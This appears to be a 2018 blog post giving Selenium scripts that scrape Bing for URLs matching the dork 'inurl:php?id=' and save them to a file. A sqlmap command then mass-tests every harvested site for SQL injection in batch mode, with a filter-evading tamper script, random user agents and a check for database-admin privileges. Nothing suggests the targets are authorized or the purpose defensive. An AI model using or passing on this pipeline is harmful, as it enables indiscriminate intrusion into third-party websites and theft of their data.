Scraping Bing with Selenium

I have to admit that I had been studying the Scrapy framework all along and wanted to solve this with it, but some of the problems I ran into are beyond my current knowledge and experience.
So for now I fell back on a simple crawler to scrape Bing's dynamically rendered pages, and it is genuinely slow.
Here is a quick-and-dirty script (adjust the numbers and the page selectors yourself):

#coding=utf-8
# Python 2 / Selenium 3, matching the original setup
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
from selenium import webdriver
import selenium.webdriver.support.ui as ui
# ActionChains provides mouse actions such as click()
from selenium.webdriver.common.action_chains import ActionChains

start_url="https://cn.bing.com/search?q=inurl%3aphp%3fid%3d&qs=HS&sc=8-0&cvid=2EEF822D8FE54B6CAAA1CE0169CA5BC5&sp=1&first=53&FORM=PERE3"
urls=[]  # collected result links

driver=webdriver.Chrome(executable_path="D:/selenium/chrome/chromedriver.exe")
wait=ui.WebDriverWait(driver,20)
driver.get(start_url)

for i in range(1,50):       # result pages to walk
	for j in range(1,15):   # result entries per page
		try:
			# wait for the j-th result's title link, then read its href
			url=wait.until(lambda x:x.find_element_by_xpath('//*[@id="b_results"]/li['+str(j)+']/h2/a').get_attribute("href"))
			print url
			urls.append(url)
		except Exception as e:
			print e
	print i
	try:
		# click the "next page" link in the pagination bar
		ActionChains(driver).click(wait.until(lambda x: x.find_element_by_css_selector("#b_results > li.b_pag > nav > ul > li:nth-child(7) > a"))).perform()
	except Exception:
		continue

print len(urls)
with open("urls.txt","a+") as f:  # the with-block closes the file itself
	for url in urls:
		f.write(url+'\n')
driver.quit()
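
The API above is Selenium 3 era: find_element_by_xpath and executable_path were removed in Selenium 4. Below is a minimal Python 3 / Selenium 4 sketch of the same loop, assuming Selenium Manager can locate chromedriver and that Bing still marks organic results with li.b_algo and the next-page link with a.sb_pagN (both selectors are assumptions to verify against the live page):

# Python 3 / Selenium 4 sketch -- selectors are assumptions, check them first
import time
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait

start_url = "https://cn.bing.com/search?q=inurl%3aphp%3fid%3d"
driver = webdriver.Chrome()      # Selenium Manager locates chromedriver itself
wait = WebDriverWait(driver, 20)
driver.get(start_url)

urls = []
for page in range(50):
    # collect every organic result link on the current page in one call
    for a in driver.find_elements(By.CSS_SELECTOR, "#b_results > li.b_algo h2 > a"):
        href = a.get_attribute("href")
        if href:
            urls.append(href)
    try:
        # assumed class of Bing's "next page" anchor
        wait.until(lambda d: d.find_element(By.CSS_SELECTOR, "a.sb_pagN")).click()
    except Exception:
        break                    # no next page: stop paging
    time.sleep(2)                # crude settle time; waiting for staleness is cleaner

with open("urls.txt", "a") as f:
    for url in urls:
        f.write(url + "\n")
driver.quit()

Grabbing all links per page with a single find_elements call avoids the per-result explicit wait, which is where most of the original script's slowness comes from.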

 
Then, you know the drill:
sqlmap -m urls.txt --batch --delay=1.3 --level=3 --tamper=space2comment --dbms=mysql --technique=EUS --random-agent --is-dba --time-sec=10 | tee result.txt
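(For reference: -m reads the target list from a file, --batch accepts sqlmap's default answer to every prompt, --tamper=space2comment rewrites spaces as inline comments to slip past naive filters, --technique=EUS restricts testing to error-based, UNION-based, and stacked-query techniques, and --is-dba checks whether the current database user has DBA privileges.)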
 
2018.8.12
